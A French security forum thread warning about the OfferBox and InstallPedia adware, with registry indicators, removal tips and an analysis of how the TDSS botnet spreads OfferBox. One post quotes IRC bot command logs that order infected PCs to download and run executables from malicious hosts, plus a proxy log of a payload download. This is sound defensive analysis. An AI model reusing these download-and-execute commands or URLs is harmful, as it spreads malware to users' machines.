OfferBox / InstallPedia - http://c.ads-*-host.com/ads.php?c=

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 86895
Inscription : 10 sept. 2005 13:57
Contact :

OfferBox / InstallPedia - http://c.ads-*-host.com/ads.php?c=

Message par Malekal_morte » 08 oct. 2010 16:56

Encore pour signaler deux autres adwares qui sont assez répandues depuis quelques semaines :
  • OfferBox
  • InstallPedia
Voici un exemple de popup de publicités qu'OfferBox peut ouvrir pendant le surf :
Image

Le principe est toujours le même, en installant des programmes dits gratuits avec des procédés parfois limites, on installe ces logiciels qui par la suite ouvriront des popups de publicités sur le PC pour rémunérer les auteurs.
Les personnes qui installent un peu tout et n'importe quoi et qui ne lisent pas les conditions d'utilisations des PC seront touchées.

La popup Offerbox qui explique que l'on va avoir des popups de publicités et un peu de tracking d'informations :
Image

Exemple de procédés limites avec : Offerbox se désinstalle très bien par ajout/suppression de programmes, voir sur le site : http://www.offerbox.com/fr/aide/desinstaller-navigateur

En ce qui concerne Offerbox, voir aussi la discussion (qui concerne aedgency) : Réponse à Malekal_morte sur: Moovida et Deenero

~~

InstallPedia modifie la page de démarrage du navigateur WEB, actuellement vers l'adresse : custom-search-fr.com
Les lignes HijackThis relatifs à InstallPedia :
O4 - HKLM\..\Run: [IP Network] C:\Program Files\InstallPedia\networker.exe
O23 - Service: service de mise a jour pour IP networker (IP netservices) - Unknown owner - C:\Program Files\InstallPedia\service.exe
ou
O4 - HKLM..\Run: [installer] C:\Program Files (x86)\Installer\lnetworker.exe ()
Rechercher IPUpdate, Installer pi InstallPedia dans ajout/suppression de programmes, s'il n'est pas présent vous pouvez utiliser Combofix pour le supprimer.

Pour s'en protéger, évitez d'installer les programmes proposées surtout via des publicités.
Soyez vigilant et lisez les conditions d'utilisation.
Activez la détection des PUP/LPI sur votre antivirus.

Voir les topics suivants :
custom-search-com-lieu-page-accueil-t28733.html
redirection-firefox-custom-search-com-t28617.html
ads-host-comment-defaire-t30556.html

En complément, vous pouvez lire le sujet : Sur la ligne… : Légitime ou non légitime ? Malware or not malware ?
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 86895
Inscription : 10 sept. 2005 13:57
Contact :

Re: OfferBox / InstallPedia

Message par Malekal_morte » 25 oct. 2010 14:00

Malwarebyte devrait le supprimer sous le nom Adware.InstallPedia
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 86895
Inscription : 10 sept. 2005 13:57
Contact :

Re: OfferBox / InstallPedia - http://c.ads-*-host.com/ads.ph

Message par Malekal_morte » 13 nov. 2010 18:32

InstallPedia semble ouvrir des popups de pubs avec l'adresse : http://c.ads-*-host.com/ads.php?c=71
où * est un chiffre.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 86895
Inscription : 10 sept. 2005 13:57
Contact :

Re: OfferBox / InstallPedia - http://c.ads-*-host.com/ads.ph

Message par Malekal_morte » 21 janv. 2011 11:50

La détection de InstallPedia : http-update-ntwk-com-networker-exe-t31023.html#p244092
Malwarebyte ne le détecte pas à chaque fois, vous pouvez utiliser AD-Remover pour le supprimer.

En outre le pack adware vient avec un programme BackupIP.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 86895
Inscription : 10 sept. 2005 13:57
Contact :

Re: OfferBox / InstallPedia - http://c.ads-*-host.com/ads.ph

Message par Malekal_morte » 15 mars 2011 22:52

Sur ce lien, il est dit que le botnet TDSS installe Offerbox : http://blog.urlvoid.com/new-tdss-varian ... -software/

Petit zoom sur ce post de MalwareBot : https://forum.malekal.com/http-get-ezdr ... 31858.html

Le setup.exe est téléchargé depuis un bot IRC

Image

Le malware droppe un fichier bundle.exe (ce qui sent le bon l'adware pour monétiser).
Image

bundle.exe lance à son tour OB.exe avec une belle icône....

Image

La suite on la devine... c'est l'installation d'Offerbox...
ce qui confirme ce qui a été donné dans le premier lien, à savoir qu'Offerbox via des affiliations est utilisé pour monétiser en étant distribué sur les PC infectés et contrôlés à distance.

Image

Image

Image

EDIT AVRIL 2011

Le même bot délivré par exploits sur site WEB - voir https://forum.malekal.com/http-201-php-t32383.html :

Code : Tout sélectionner

1302638372.694    407 192.168.1.90 TCP_MISS/200 55833 GET http://91.201.66.5/d.php?f=18&e=4 - DIRECT/91.201.66.5 application/x-msdownload
Qui fait télécharger et exécuter d'autres malwares pour monétiser :
MODE [00_FRA_XP_2389781] -ix

JOIN #a1

:[00_FRA_XP_2389781]!SP2-118@xxxx.abo.wanadoo.fr JOIN :#a1

:Apache2.0 332 [00_FRA_XP_2389781] #a1 :.world1 -S|.world1 hxtp://digitaltoolsworld.in/install.48208.exe C:\up2.exe 1|.exp -S|.http hxtp://black-cash.com/a11.exe|.exp sv 10 0 0 -c|.exp sv 25 0 0 -b|.exp sv 50 3 0 -b -r -e

:Apache2.0 333 [00_FRA_XP_2389781] #a1 xxx 1302577475
:[00_FRA_XP_2389781]!SP2-118@xxxabo.wanadoo.fr JOIN :#ita

:Apache2.0 332 [00_FRA_XP_2389781] #ita :.world1 -S|.world1 hxttp://get.master.ppidropper.com/exe/4910b18a623c549e2e1bc53f6cc0682a4579fbf6/setup.exe C:\update.exe 1

:Apache2.0 333 [00_FRA_XP_2389781] #ita xxx 1302577481
:Apache2.0 NOTICE [00_FRA_XP_2389781] :*** You were forced to join #ita



[00_FRA_XP_2389781]!SP2-118@xxxxx.abo.wanadoo.fr JOIN :#a1

:Apache2.0 332 [00_FRA_XP_2389781] #a1 :.world1 -S|.world1 hxtp://digitaltoolsworld.in/install.48208.exe C:\up2.exe 1|.exp -S|.hxtp http://black-cash.com/a11.exe|.exp sv 10 0 0 -c|.exp sv 25 0 0 -b|.exp sv 50 3 0 -b -r -e

:Apache2.0 333 [00_FRA_XP_2389781] #a1 xxx 1302577475
:[00_FRA_XP_2389781]!SP2-118@AMontsouris-152-1-38-83.w82-123.abo.wanadoo.fr JOIN :#ita

:Apache2.0 332 [00_FRA_XP_2389781] #ita :.world1 -S|.world1 hxtp://get.master.ppidropper.com/exe/4910b18a623c549e2e1bc53f6cc0682a4579fbf6/setup.exe C:\update.exe 1

:Apache2.0 333 [00_FRA_XP_2389781] #ita xxx 1302577481
:Apache2.0 NOTICE [00_FRA_XP_2389781] :*** You were forced to join #ita
hxtp://get.master.ppidropper.com/exe/4910b18a623c549e2e1bc53f6cc0682a4579fbf6/setup.exe = Offerbox
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 86895
Inscription : 10 sept. 2005 13:57
Contact :

Re: OfferBox / InstallPedia - http://c.ads-*-host.com/ads.ph

Message par Malekal_morte » 20 avr. 2011 11:19

Offerbox proposé via MediaGet2 sur les faux sites de Warez qui propage Trojan.Win32.Jorik.Skor
=> https://www.malekal.com/2011/04/20/troja ... log-power/
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 86895
Inscription : 10 sept. 2005 13:57
Contact :

Re: OfferBox / InstallPedia - http://c.ads-*-host.com/ads.ph

Message par Malekal_morte » 20 avr. 2011 12:17

Un autre programme GPL repacké pour y bundle Offerbox/Fissa : EasyPCCleaner
Voir : https://www.malekal.com/2011/04/20/easy- ... -et-fissa/
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Répondre

Revenir vers « Adwares et PUPs (programmes indésirables) »

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 0 invité